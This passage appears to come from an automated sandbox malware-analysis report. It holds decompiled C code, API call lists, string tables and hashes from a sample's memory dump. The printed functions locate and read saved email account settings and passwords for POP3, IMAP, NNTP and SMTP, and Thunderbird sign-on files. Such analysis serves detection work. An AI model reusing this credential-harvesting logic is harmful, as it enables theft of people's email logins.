                                                                                              									_v8 = _t246;
                                                                                              									L18:
                                                                                              									if(_v8 <= 0) {
                                                                                              										goto L29;
                                                                                              									}
                                                                                              									memcpy( &_v76, _t251, _v8);
                                                                                              									 *((char*)(_t255 + _v8 - 0x48)) = 0;
                                                                                              									_t226 = atoi( &_v76);
                                                                                              									_t256 = _t256 + 0x10;
                                                                                              									_v32 = _t226;
                                                                                              									_v12 = 0;
                                                                                              									asm("stosb");
                                                                                              									_v30 = 0;
                                                                                              									WideCharToMultiByte(0, 0,  &_v32, 0xffffffff,  &_v12, 2, 0, 0);
                                                                                              									 *((char*)(_t231 + _a4)) = _v12;
                                                                                              									_t231 = _t231 + 1;
                                                                                              									_t254 = _t254 + _v8 + 3;
                                                                                              									goto L43;
                                                                                              								}
                                                                                              								_t246 = _t246 + 1;
                                                                                              								if(_t246 >= 6) {
                                                                                              									break;
                                                                                              								}
                                                                                              								_t240 = _t240 + 1;
                                                                                              							}
                                                                                              							_v8 = _v8 | 0xffffffff;
                                                                                              							goto L18;
                                                                                              						}
                                                                                              					}
                                                                                              					 *((char*)(_t231 + _a4)) =  *((intOrPtr*)(_t255 + _t249 - 0x14));
                                                                                              					_t231 = _t231 + 1;
                                                                                              					_t254 = _t254 + _v8 + 1;
                                                                                              					goto L43;
                                                                                              				}
                                                                                              				goto L45;
                                                                                              			}
                                                                                              0x0040fbc6
                                                                                              0x0040fbcd
                                                                                              0x0040fbd4
                                                                                              0x0040fbdb
                                                                                              0x0040fbe2
                                                                                              0x0040fbe9
                                                                                              0x0040fbf0
                                                                                              0x0040fbf7
                                                                                              0x0040fde5
                                                                                              0x0040fde8
                                                                                              0x0040fdee
                                                                                              0x0040fdf1
                                                                                              0x0040fe04
                                                                                              0x0040fdfd
                                                                                              0x0040fdfd
                                                                                              0x00000000
                                                                                              0x0040fdfd
                                                                                              0x0040fdf1
                                                                                              0x0040fbfe
                                                                                              0x0040fc0d
                                                                                              0x0040fc10
                                                                                              0x0040fc14
                                                                                              0x0040fc17
                                                                                              0x0040fd94
                                                                                              0x0040fd98
                                                                                              0x0040fdd2
                                                                                              0x0040fdd5
                                                                                              0x0040fd9e
                                                                                              0x0040fda1
                                                                                              0x0040fda6
                                                                                              0x0040fdaa
                                                                                              0x0040fdaf
                                                                                              0x0040fdb6
                                                                                              0x0040fdb6
                                                                                              0x0040fdaf
                                                                                              0x0040fdb8
                                                                                              0x0040fdb8
                                                                                              0x0040fdd6
                                                                                              0x0040fdd7
                                                                                              0x0040fdd7
                                                                                              0x0040fdde
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040fdde
                                                                                              0x0040fc1d
                                                                                              0x0040fc20
                                                                                              0x0040fc23
                                                                                              0x0040fc27
                                                                                              0x0040fc31
                                                                                              0x0040fc37
                                                                                              0x0040fc3c
                                                                                              0x0040fc41
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040fc43
                                                                                              0x0040fc47
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040fc49
                                                                                              0x0040fc51
                                                                                              0x0040fd5c
                                                                                              0x0040fd5c
                                                                                              0x0040fd60
                                                                                              0x0040fd63
                                                                                              0x0040fd6b
                                                                                              0x0040fd73
                                                                                              0x0040fd7c
                                                                                              0x0040fd81
                                                                                              0x0040fd86
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040fd88
                                                                                              0x0040fd8f
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040fd91
                                                                                              0x00000000
                                                                                              0x0040fd91
                                                                                              0x0040fdc5
                                                                                              0x0040fdc8
                                                                                              0x0040fdc9
                                                                                              0x00000000
                                                                                              0x0040fdc9
                                                                                              0x0040fc57
                                                                                              0x0040fc57
                                                                                              0x0040fc5b
                                                                                              0x0040fc60
                                                                                              0x0040fd11
                                                                                              0x0040fd11
                                                                                              0x0040fd15
                                                                                              0x0040fd17
                                                                                              0x0040fd26
                                                                                              0x0040fd26
                                                                                              0x0040fd2a
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040fd1d
                                                                                              0x0040fd2f
                                                                                              0x0040fd31
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040fd39
                                                                                              0x0040fd42
                                                                                              0x0040fd47
                                                                                              0x0040fd4f
                                                                                              0x0040fd52
                                                                                              0x0040fd55
                                                                                              0x0040fd56
                                                                                              0x00000000
                                                                                              0x0040fd56
                                                                                              0x0040fd1f
                                                                                              0x0040fd23
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040fd25
                                                                                              0x0040fd25
                                                                                              0x0040fd2c
                                                                                              0x00000000
                                                                                              0x0040fc6f
                                                                                              0x0040fc6f
                                                                                              0x0040fc71
                                                                                              0x0040fc97
                                                                                              0x0040fc97
                                                                                              0x0040fc9b
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040fc8e
                                                                                              0x0040fd0c
                                                                                              0x0040fca1
                                                                                              0x0040fca5
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040fcb3
                                                                                              0x0040fcbb
                                                                                              0x0040fcc4
                                                                                              0x0040fcc9
                                                                                              0x0040fcd4
                                                                                              0x0040fce3
                                                                                              0x0040fceb
                                                                                              0x0040fcec
                                                                                              0x0040fcf0
                                                                                              0x0040fcfc
                                                                                              0x0040fd02
                                                                                              0x0040fd03
                                                                                              0x00000000
                                                                                              0x0040fd03
                                                                                              0x0040fc90
                                                                                              0x0040fc94
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040fc96
                                                                                              0x0040fc96
                                                                                              0x0040fc9d
                                                                                              0x00000000
                                                                                              0x0040fc9d
                                                                                              0x0040fc60
                                                                                              0x0040fc7c
                                                                                              0x0040fc82
                                                                                              0x0040fc83
                                                                                              0x00000000
                                                                                              0x0040fc83
                                                                                              0x00000000

                                                                                              APIs
                                                                                              • strlen.MSVCRT ref: 0040FC27
                                                                                              • strncmp.MSVCRT(?,00413F68,00000000,00413F68,?,?,?), ref: 0040FC37
                                                                                              • memcpy.MSVCRT ref: 0040FCB3
                                                                                              • atoi.MSVCRT ref: 0040FCC4
                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00000002,00000000,00000000,?,?,?,?,?,?,?,?), ref: 0040FCF0
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000F.00000002.333065075.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000F.00000002.333100193.0000000000418000.00000040.00000001.sdmp Download File
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: ByteCharMultiWideatoimemcpystrlenstrncmp
                                                                                              • String ID: AElig;$Aacute;$Acirc;$Agrave;$Aring;$Atilde;$Auml;$Ccedil;$ETH;$Eacute;$Ecirc;$Egrave;$Euml;$Iacute;$Icirc;$Igrave;$Iuml;$Ntilde;$Oacute;$Ocirc;$Ograve;$Oslash;$Otilde;$Ouml;$THORN;$Uacute;$Ucirc;$Ugrave;$Uuml;$Yacute;$aacute;$acirc;$acute;$aelig;$agrave;$amp;$apos;$aring;$atilde;$auml;$brvbar;$ccedil;$cedil;$cent;$copy;$curren;$deg;$divide;$eacute;$ecirc;$egrave;$eth;$euml;$frac12;$frac14;$frac34;$gt;$iacute;$icirc;$iexcl;$igrave;$iquest;$iuml;$laquo;$lt;$macr;$micro;$middot;$nbsp;$not;$ntilde;$oacute;$ocirc;$ograve;$ordf;$ordm;$oslash;$otilde;$ouml;$para;$plusmn;$pound;$quot;$raquo;$reg;$sect;$shy;$sup1;$sup2;$sup3;$szlig;$thorn;$times;$uacute;$ucirc;$ugrave;$uml;$uuml;$yacute;$yen;$yuml;
                                                                                              • API String ID: 1895597112-3210201812
                                                                                              • Opcode ID: e32dadd6ea65d4380dfb3bd6d4dee2632db13c381429c7de7dc985ffcf152ca1
                                                                                              • Instruction ID: 7b61ab7fda62f62168f3ac6a9ee0746413b6f8a7e258cbbb94e4f4552fbd63bc
                                                                                              • Opcode Fuzzy Hash: e32dadd6ea65d4380dfb3bd6d4dee2632db13c381429c7de7dc985ffcf152ca1
                                                                                              • Instruction Fuzzy Hash: 49F139B08012589EDB21CF95D8487DEBFB0AF96308F5481EAD5593B241C7B94BC9CF98
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 82%
                                                                                              			E004106BE(void* __ecx, void* __edx) {
                                                                                              				void* __ebx;
                                                                                              				void* __edi;
                                                                                              				int _t58;
                                                                                              				int _t59;
                                                                                              				int _t60;
                                                                                              				int _t61;
                                                                                              				int _t63;
                                                                                              				void* _t96;
                                                                                              				void* _t99;
                                                                                              				void* _t102;
                                                                                              				void* _t105;
                                                                                              				void* _t108;
                                                                                              				void* _t111;
                                                                                              				void* _t114;
                                                                                              				void* _t117;
                                                                                              				void* _t123;
                                                                                              				void* _t194;
                                                                                              				void* _t196;
                                                                                              				void* _t201;
                                                                                              				char* _t202;
                                                                                              
                                                                                              				_t194 = __edx;
                                                                                              				_t201 = __ecx;
                                                                                              				if(strcmp(__ecx + 0x46c, "Account_Name") == 0) {
                                                                                              					_t204 = _t201 + 0x460;
                                                                                              					E004060D0(0xff, _t201 + 0x870, E00406B74( *(_t201 + 0x460)));
                                                                                              					_t123 = E00406B74( *_t204);
                                                                                              					_t195 = _t201 + 0xf84;
                                                                                              					E004060D0(0xff, _t201 + 0xf84, _t123);
                                                                                              				}
                                                                                              				_t202 = _t201 + 0x46c;
                                                                                              				if(strcmp(_t202, "POP3_Server") == 0) {
                                                                                              					_t117 = E00406B74( *((intOrPtr*)(_t201 + 0x460)));
                                                                                              					_t195 = _t201 + 0x970;
                                                                                              					E004060D0(0xff, _t201 + 0x970, _t117);
                                                                                              				}
                                                                                              				if(strcmp(_t202, "IMAP_Server") == 0) {
                                                                                              					_t114 = E00406B74( *((intOrPtr*)(_t201 + 0x460)));
                                                                                              					_t195 = _t201 + 0x970;
                                                                                              					E004060D0(0xff, _t201 + 0x970, _t114);
                                                                                              				}
                                                                                              				if(strcmp(_t202, "NNTP_Server") == 0) {
                                                                                              					_t111 = E00406B74( *((intOrPtr*)(_t201 + 0x460)));
                                                                                              					_t195 = _t201 + 0x970;
                                                                                              					E004060D0(0xff, _t201 + 0x970, _t111);
                                                                                              				}
                                                                                              				if(strcmp(_t202, "SMTP_Server") == 0) {
                                                                                              					_t108 = E00406B74( *((intOrPtr*)(_t201 + 0x460)));
                                                                                              					_t195 = _t201 + 0x1084;
                                                                                              					E004060D0(0xff, _t201 + 0x1084, _t108);
                                                                                              				}
                                                                                              				if(strcmp(_t202, "POP3_User_Name") == 0) {
                                                                                              					_t105 = E00406B74( *((intOrPtr*)(_t201 + 0x460)));
                                                                                              					_t195 = _t201 + 0xb70;
                                                                                              					E004060D0(0xff, _t201 + 0xb70, _t105);
                                                                                              					 *((intOrPtr*)(_t201 + 0xf70)) = 1;
                                                                                              				}
                                                                                              				if(strcmp(_t202, "IMAP_User_Name") == 0) {
                                                                                              					_t102 = E00406B74( *((intOrPtr*)(_t201 + 0x460)));
                                                                                              					_t195 = _t201 + 0xb70;
                                                                                              					E004060D0(0xff, _t201 + 0xb70, _t102);
                                                                                              					 *((intOrPtr*)(_t201 + 0xf70)) = 2;
                                                                                              				}
                                                                                              				if(strcmp(_t202, "NNTP_User_Name") == 0) {
                                                                                              					_t99 = E00406B74( *((intOrPtr*)(_t201 + 0x460)));
                                                                                              					_t195 = _t201 + 0xb70;
                                                                                              					E004060D0(0xff, _t201 + 0xb70, _t99);
                                                                                              					 *((intOrPtr*)(_t201 + 0xf70)) = 4;
                                                                                              				}
                                                                                              				if(strcmp(_t202, "SMTP_User_Name") == 0) {
                                                                                              					_t96 = E00406B74( *((intOrPtr*)(_t201 + 0x460)));
                                                                                              					_t195 = _t201 + 0x1284;
                                                                                              					E004060D0(0xff, _t201 + 0x1284, _t96);
                                                                                              					 *((intOrPtr*)(_t201 + 0x1684)) = 3;
                                                                                              				}
                                                                                              				_t58 = strcmp(_t202, "POP3_Password2");
                                                                                              				_t214 = _t58;
                                                                                              				if(_t58 == 0) {
                                                                                              					E00410525(E00406B74( *((intOrPtr*)(_t201 + 0x460))), _t194, _t195, _t214, _t201, _t201 + 0x870);
                                                                                              				}
                                                                                              				_t59 = strcmp(_t202, "IMAP_Password2");
                                                                                              				_t215 = _t59;
                                                                                              				if(_t59 == 0) {
                                                                                              					E00410525(E00406B74( *((intOrPtr*)(_t201 + 0x460))), _t194, _t195, _t215, _t201, _t201 + 0x870);
                                                                                              				}
                                                                                              				_t60 = strcmp(_t202, "NNTP_Password2");
                                                                                              				_t216 = _t60;
                                                                                              				if(_t60 == 0) {
                                                                                              					E00410525(E00406B74( *((intOrPtr*)(_t201 + 0x460))), _t194, _t195, _t216, _t201, _t201 + 0x870);
                                                                                              				}
                                                                                              				_t61 = strcmp(_t202, "SMTP_Password2");
                                                                                              				_t217 = _t61;
                                                                                              				if(_t61 == 0) {
                                                                                              					E00410525(E00406B74( *((intOrPtr*)(_t201 + 0x460))), _t194, _t195, _t217, _t201, _t201 + 0xf84);
                                                                                              				}
                                                                                              				if(strcmp(_t202, "NNTP_Email_Address") == 0) {
                                                                                              					E004060D0(0xff, _t201 + 0xe70, E00406B74( *((intOrPtr*)(_t201 + 0x460))));
                                                                                              				}
                                                                                              				_t63 = strcmp(_t202, "SMTP_Email_Address");
                                                                                              				if(_t63 == 0) {
                                                                                              					_t203 = _t201 + 0x460;
                                                                                              					E004060D0(0xff, _t201 + 0xe70, E00406B74( *(_t201 + 0x460)));
                                                                                              					_t63 = E004060D0(0xff, _t201 + 0x1584, E00406B74( *_t203));
                                                                                              				}
                                                                                              				_push("SMTP_Port");
                                                                                              				_t196 = _t201 + 0x46c;
                                                                                              				_push(_t196);
                                                                                              				L004115DC();
                                                                                              				if(_t63 == 0) {
                                                                                              					_t63 = E00406512(E00406B74( *((intOrPtr*)(_t201 + 0x460))));
                                                                                              					 *(_t201 + 0x168c) = _t63;
                                                                                              				}
                                                                                              				_push("NNTP_Port");
                                                                                              				_push(_t196);
                                                                                              				L004115DC();
                                                                                              				if(_t63 == 0) {
                                                                                              					L35:
                                                                                              					_t63 = E00406512(E00406B74( *((intOrPtr*)(_t201 + 0x460))));
                                                                                              					 *(_t201 + 0xf78) = _t63;
                                                                                              				} else {
                                                                                              					_push("IMAP_Port");
                                                                                              					_push(_t196);
                                                                                              					L004115DC();
                                                                                              					if(_t63 == 0) {
                                                                                              						goto L35;
                                                                                              					} else {
                                                                                              						_push("POP3_Port");
                                                                                              						_push(_t196);
                                                                                              						L004115DC();
                                                                                              						if(_t63 == 0) {
                                                                                              							goto L35;
                                                                                              						}
                                                                                              					}
                                                                                              				}
                                                                                              				_push("SMTP_Secure_Connection");
                                                                                              				_push(_t196);
                                                                                              				L004115DC();
                                                                                              				if(_t63 == 0) {
                                                                                              					_t63 = E00406512(E00406B74( *((intOrPtr*)(_t201 + 0x460))));
                                                                                              					 *(_t201 + 0x1690) = _t63;
                                                                                              				}
                                                                                              				_push("NNTP_Secure_Connection");
                                                                                              				_push(_t196);
                                                                                              				L004115DC();
                                                                                              				if(_t63 == 0) {
                                                                                              					L41:
                                                                                              					 *((intOrPtr*)(_t201 + 0xf7c)) = E00406512(E00406B74( *((intOrPtr*)(_t201 + 0x460))));
                                                                                              				} else {
                                                                                              					_push("IMAP_Secure_Connection");
                                                                                              					_push(_t196);
                                                                                              					L004115DC();
                                                                                              					if(_t63 == 0) {
                                                                                              						goto L41;
                                                                                              					} else {
                                                                                              						_push("POP3_Secure_Connection");
                                                                                              						_push(_t196);
                                                                                              						L004115DC();
                                                                                              						if(_t63 == 0) {
                                                                                              							goto L41;
                                                                                              						}
                                                                                              					}
                                                                                              				}
                                                                                              				return 1;
                                                                                              			}
























                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000F.00000002.333065075.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000F.00000002.333100193.0000000000418000.00000040.00000001.sdmp
                                                                                              Similarity
                                                                                              • API ID: strcmp$_stricmp$memcpystrlen
                                                                                              • String ID: Account_Name$IMAP_Password2$IMAP_Port$IMAP_Secure_Connection$IMAP_Server$IMAP_User_Name$NNTP_Email_Address$NNTP_Password2$NNTP_Port$NNTP_Secure_Connection$NNTP_Server$NNTP_User_Name$POP3_Password2$POP3_Port$POP3_Secure_Connection$POP3_Server$POP3_User_Name$SMTP_Email_Address$SMTP_Password2$SMTP_Port$SMTP_Secure_Connection$SMTP_Server$SMTP_User_Name
                                                                                              • API String ID: 1113949926-2499304436
                                                                                              • Opcode ID: 0c75f3a23bfcbdff00a9aa801863508d09b02361048c6915a7d59a784447564f
                                                                                              • Instruction ID: 03d5d7842382467f3947e80262f6a1f2e973b0058f56c731c8fd5b97bb90a946
                                                                                              • Opcode Fuzzy Hash: 0c75f3a23bfcbdff00a9aa801863508d09b02361048c6915a7d59a784447564f
                                                                                              • Instruction Fuzzy Hash: D391517220870569E624B7329C02FD773E8AF9032DF21052FF55BE61D2EEADB981465C
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 74%
                                                                                              			E0040C7CF(intOrPtr __ecx, void* __edx, char* _a4, char* _a8) {
                                                                                              				signed int _v8;
                                                                                              				intOrPtr _v12;
                                                                                              				char _v16;
                                                                                              				void _v271;
                                                                                              				char _v272;
                                                                                              				void* __ebx;
                                                                                              				void* __edi;
                                                                                              				int _t64;
                                                                                              				int _t66;
                                                                                              				int _t68;
                                                                                              				int _t69;
                                                                                              				int _t72;
                                                                                              				int _t85;
                                                                                              				void* _t91;
                                                                                              				void* _t132;
                                                                                              				char* _t133;
                                                                                              				char* _t135;
                                                                                              				char* _t137;
                                                                                              				char* _t139;
                                                                                              				intOrPtr _t151;
                                                                                              				int _t153;
                                                                                              				int _t154;
                                                                                              				void* _t155;
                                                                                              
                                                                                              				_t132 = __edx;
                                                                                              				_v12 = __ecx;
                                                                                              				_v272 = 0;
                                                                                              				memset( &_v271, 0, 0xff);
                                                                                              				_t133 = "mail.account.account";
                                                                                              				_t64 = strlen(_t133);
                                                                                              				_t148 = _t64;
                                                                                              				_t134 = _a4;
                                                                                              				if(strncmp(_a4, _t133, _t64) != 0) {
                                                                                              					_v8 = _v8 & 0x00000000;
                                                                                              				} else {
                                                                                              					_v8 = E0040C748(_t134,  &_v16, _t148);
                                                                                              				}
                                                                                              				if(_v8 != 0) {
                                                                                              					_push("identities");
                                                                                              					_push(_v8);
                                                                                              					L004115B2();
                                                                                              					if(_t91 == 0) {
                                                                                              						_t17 = _t155 + 0x604; // 0x604
                                                                                              						E004060D0(0xff, _t17, _a8);
                                                                                              					}
                                                                                              				}
                                                                                              				_t135 = "mail.server";
                                                                                              				_t66 = strlen(_t135);
                                                                                              				_t149 = _t66;
                                                                                              				_t136 = _a4;
                                                                                              				if(strncmp(_a4, _t135, _t66) != 0) {
                                                                                              					_v8 = _v8 & 0x00000000;
                                                                                              				} else {
                                                                                              					_v8 = E0040C6F3(_t149, _t136,  &_v272);
                                                                                              				}
                                                                                              				if(_v8 != 0) {
                                                                                              					_t85 = E0040CA7D(_v12 + 0xffffffe8, _t132,  &_v272);
                                                                                              					_push("username");
                                                                                              					_push(_v8);
                                                                                              					_t154 = _t85;
                                                                                              					L004115B2();
                                                                                              					if(_t85 == 0) {
                                                                                              						_t28 = _t154 + 0x204; // 0x204
                                                                                              						_t85 = E004060D0(0xff, _t28, _a8);
                                                                                              					}
                                                                                              					_push("type");
                                                                                              					_push(_v8);
                                                                                              					L004115B2();
                                                                                              					if(_t85 == 0) {
                                                                                              						_t31 = _t154 + 0x504; // 0x504
                                                                                              						_t85 = E004060D0(0xff, _t31, _a8);
                                                                                              					}
                                                                                              					_push("hostname");
                                                                                              					_push(_v8);
                                                                                              					L004115B2();
                                                                                              					if(_t85 == 0) {
                                                                                              						_t34 = _t154 + 0x104; // 0x104
                                                                                              						_t85 = E004060D0(0xff, _t34, _a8);
                                                                                              					}
                                                                                              					_push("port");
                                                                                              					_push(_v8);
                                                                                              					L004115B2();
                                                                                              					if(_t85 == 0) {
                                                                                              						_t85 = atoi(_a8);
                                                                                              						 *(_t154 + 0x804) = _t85;
                                                                                              					}
                                                                                              					_push("useSecAuth");
                                                                                              					_push(_v8);
                                                                                              					L004115B2();
                                                                                              					if(_t85 == 0) {
                                                                                              						_push("true");
                                                                                              						_push(_a8);
                                                                                              						L004115B2();
                                                                                              						if(_t85 == 0) {
                                                                                              							 *((intOrPtr*)(_t154 + 0x808)) = 1;
                                                                                              						}
                                                                                              					}
                                                                                              				}
                                                                                              				_t137 = "mail.identity";
                                                                                              				_t68 = strlen(_t137);
                                                                                              				_t150 = _t68;
                                                                                              				_t138 = _a4;
                                                                                              				_t69 = strncmp(_a4, _t137, _t68);
                                                                                              				if(_t69 != 0) {
                                                                                              					_v8 = _v8 & 0x00000000;
                                                                                              				} else {
                                                                                              					_t69 = E0040C6F3(_t150, _t138,  &_v272);
                                                                                              					_v8 = _t69;
                                                                                              				}
                                                                                              				if(_v8 != 0) {
                                                                                              					_t69 = E0040CA7D(_v12 + 0xffffffe8, _t132,  &_v272);
                                                                                              					_push("useremail");
                                                                                              					_push(_v8);
                                                                                              					_t153 = _t69;
                                                                                              					L004115B2();
                                                                                              					if(_t69 == 0) {
                                                                                              						_t51 = _t153 + 0x404; // 0x404
                                                                                              						_t69 = E004060D0(0xff, _t51, _a8);
                                                                                              					}
                                                                                              					_push("fullname");
                                                                                              					_push(_v8);
                                                                                              					L004115B2();
                                                                                              					if(_t69 == 0) {
                                                                                              						_t54 = _t153 + 4; // 0x4
                                                                                              						_t69 = E004060D0(0xff, _t54, _a8);
                                                                                              					}
                                                                                              				}
                                                                                              				_push("signon.signonfilename");
                                                                                              				_push(_a4);
                                                                                              				L004115B2();
                                                                                              				if(_t69 == 0) {
                                                                                              					_t151 = _v12;
                                                                                              					_t139 = _t151 + 0x245;
                                                                                              					_t152 = _t151 + 0x140;
                                                                                              					_t72 = strlen(_t151 + 0x140);
                                                                                              					_t60 = strlen(_a8) + 1; // 0x1
                                                                                              					if(_t72 + _t60 >= 0x104) {
                                                                                              						 *_t139 = 0;
                                                                                              					} else {
                                                                                              						E004062AD(_t139, _t152, _a8);
                                                                                              					}
                                                                                              				}
                                                                                              				return 1;
                                                                                              			}



























                                                                                              APIs
                                                                                              • memset.MSVCRT ref: 0040C7F4
                                                                                              • strlen.MSVCRT ref: 0040C7FF
                                                                                              • strncmp.MSVCRT(?,mail.account.account,00000000,mail.account.account,?,00000000,000000FF), ref: 0040C80C
                                                                                              • _stricmp.MSVCRT(00000000,server), ref: 0040C849
                                                                                              • _stricmp.MSVCRT(00000000,identities), ref: 0040C86B
                                                                                              • strlen.MSVCRT ref: 0040C88B
                                                                                              • strncmp.MSVCRT(?,mail.server,00000000,mail.server), ref: 0040C898
                                                                                              • _stricmp.MSVCRT(00000000,username,00000000), ref: 0040C8E1
                                                                                              • _stricmp.MSVCRT(00000000,type,00000000), ref: 0040C903
                                                                                              • _stricmp.MSVCRT(00000000,hostname,00000000), ref: 0040C925
                                                                                              • _stricmp.MSVCRT(00000000,port,00000000), ref: 0040C947
                                                                                              • atoi.MSVCRT ref: 0040C955
                                                                                                • Part of subcall function 0040C748: memset.MSVCRT ref: 0040C77E
                                                                                                • Part of subcall function 0040C748: memcpy.MSVCRT ref: 0040C7A0
                                                                                                • Part of subcall function 0040C748: atoi.MSVCRT ref: 0040C7B4
                                                                                              • _stricmp.MSVCRT(00000000,useSecAuth,00000000), ref: 0040C969
                                                                                              • _stricmp.MSVCRT(?,true,00000000), ref: 0040C97C
                                                                                              • strlen.MSVCRT ref: 0040C997
                                                                                              • strncmp.MSVCRT(?,mail.identity,00000000,mail.identity), ref: 0040C9A4
                                                                                              • _stricmp.MSVCRT(00000000,useremail,00000000), ref: 0040C9E9
                                                                                              • _stricmp.MSVCRT(00000000,fullname,00000000), ref: 0040CA0B
                                                                                              • _stricmp.MSVCRT(?,signon.signonfilename), ref: 0040CA2A
                                                                                              • strlen.MSVCRT ref: 0040CA45
                                                                                              • strlen.MSVCRT ref: 0040CA4F
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000F.00000002.333065075.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000F.00000002.333100193.0000000000418000.00000040.00000001.sdmp
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: _stricmp$strlen$strncmp$atoimemset$memcpy
                                                                                              • String ID: fullname$hostname$identities$mail.account.account$mail.identity$mail.server$port$server$signon.signonfilename$true$type$useSecAuth$useremail$username
                                                                                              • API String ID: 736090197-593045482
                                                                                              • Opcode ID: fa6975b133b13f5067aa23c0df6e7e68559b1782356a0831ed68d1fdd542dc29
                                                                                              • Instruction ID: 8e23c8f9271997a3be880b93158be8956f510041fead3e1da2e0ecaa9a645c54
                                                                                              • Opcode Fuzzy Hash: fa6975b133b13f5067aa23c0df6e7e68559b1782356a0831ed68d1fdd542dc29
                                                                                              • Instruction Fuzzy Hash: E271C972504204FADF10EB65CC42BDE77A6DF50329F20426BF506B21E1EB79AF819A5C
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 98%
                                                                                              			E0040E4A4(void* __ecx, intOrPtr* __esi, void* __eflags, signed int _a4, signed int _a8, intOrPtr _a12, struct HDC__* _a16, long _a20, long _a24, intOrPtr _a28, signed int _a32, long _a36, intOrPtr _a40, struct tagPOINT _a44, intOrPtr _a48, intOrPtr _a52, intOrPtr _a56, struct tagPOINT _a60, intOrPtr _a64, intOrPtr _a68, intOrPtr _a72, intOrPtr _a76, char _a80, intOrPtr _a84, intOrPtr _a88, intOrPtr _a92, long _a96, struct tagPOINT _a100, intOrPtr _a104, intOrPtr _a108, intOrPtr _a112, struct tagSIZE _a116, struct tagRECT _a124, intOrPtr _a128, intOrPtr _a136, char _a336) {
                                                                                              				signed int _v0;
                                                                                              				intOrPtr _v4;
                                                                                              				intOrPtr _v8;
                                                                                              				intOrPtr _v16;
                                                                                              				intOrPtr _v20;
                                                                                              				signed int _v28;
                                                                                              				intOrPtr _v44;
                                                                                              				struct HWND__* _v48;
                                                                                              				struct HWND__* _v52;
                                                                                              				intOrPtr _v60;
                                                                                              				intOrPtr _v64;
                                                                                              				intOrPtr _v68;
                                                                                              				struct HDC__* _t169;
                                                                                              				struct HWND__* _t171;
                                                                                              				intOrPtr _t223;
                                                                                              				void* _t224;
                                                                                              				intOrPtr _t235;
                                                                                              				struct HWND__* _t237;
                                                                                              				void* _t240;
                                                                                              				intOrPtr* _t274;
                                                                                              				signed int _t275;
                                                                                              				signed int _t276;
                                                                                              
                                                                                              				_t274 = __esi;
                                                                                              				_t276 = _t275 & 0xfffffff8;
                                                                                              				E004118A0(0x2198, __ecx);
                                                                                              				_a12 =  *((intOrPtr*)( *((intOrPtr*)(__esi + 0x10)) + 0x1b4));
                                                                                              				_t237 = GetDlgItem( *(__esi + 4), 0x3e9);
                                                                                              				_a4 = GetDlgItem( *(__esi + 4), 0x3e8);
                                                                                              				_a20 = GetWindowLongA(_t237, 0xfffffff0);
                                                                                              				_a24 = GetWindowLongA(_a4, 0xfffffff0);
                                                                                              				_a96 = GetWindowLongA(_t237, 0xffffffec);
                                                                                              				_a36 = GetWindowLongA(_a4, 0xffffffec);
                                                                                              				GetWindowRect(_t237,  &_a100);
                                                                                              				GetWindowRect(_a4,  &_a60);
                                                                                              				MapWindowPoints(0,  *(__esi + 4),  &_a100, 2);
                                                                                              				MapWindowPoints(0,  *(__esi + 4),  &_a60, 2);
                                                                                              				_t240 = _a108 - _a100.x;
                                                                                              				_a4 = _a4 & 0x00000000;
                                                                                              				_a28 = _a68 - _a60.x;
                                                                                              				_a76 = _a112 - _a104;
                                                                                              				_a40 = _a72 - _a64;
                                                                                              				_t169 = GetDC( *(__esi + 4));
                                                                                              				_a16 = _t169;
                                                                                              				if(_t169 == 0) {
                                                                                              					L9:
                                                                                              					_v0 = _v0 & 0x00000000;
                                                                                              					if( *((intOrPtr*)( *((intOrPtr*)(_t274 + 0x10)) + 0x1b0)) <= 0) {
                                                                                              						L12:
                                                                                              						_t171 = GetDlgItem( *(_t274 + 4), 1);
                                                                                              						_a36 = _t171;
                                                                                              						GetWindowRect(_t171,  &_a44);
                                                                                              						MapWindowPoints(0,  *(_t274 + 4),  &_a44, 2);
                                                                                              						GetClientRect( *(_t274 + 4),  &_a124);
                                                                                              						GetWindowRect( *(_t274 + 4),  &_a80);
                                                                                              						SetWindowPos( *(_t274 + 4), 0, 0, 0, _a88 - _a80 + 1, _a128 - _a136 - _a48 - _a84 + _a56 + _a92 + _a4 + 0x15, 0x206);
                                                                                              						GetClientRect( *(_t274 + 4),  &_a80);
                                                                                              						return SetWindowPos(_a36, 0, _a44.x, _a48 - _a56 - _a84 + _a92 - 5, _a52 - _a44 + 1, _a56 - _a48 + 1, 0x204);
                                                                                              					}
                                                                                              					_a20 = _a20 | 0x10000000;
                                                                                              					_a24 = _a24 | 0x10000000;
                                                                                              					_a8 = _a12 + 0x10;
                                                                                              					do {
                                                                                              						 *((intOrPtr*)( *_t274 + 0x1c))(_v0);
                                                                                              						_v20 = E00401562(_t274, _a92, "STATIC", _a16, _a96, _v0 + _a100.x, _t240, _a72);
                                                                                              						_v44 = E00401562(_t274, _a4, "EDIT", _v8, _a28, _v28 + _a32, _v4,  *(_t274 + 0x14) * _a8);
                                                                                              						sprintf( &_a80, "%s:", _v52->i);
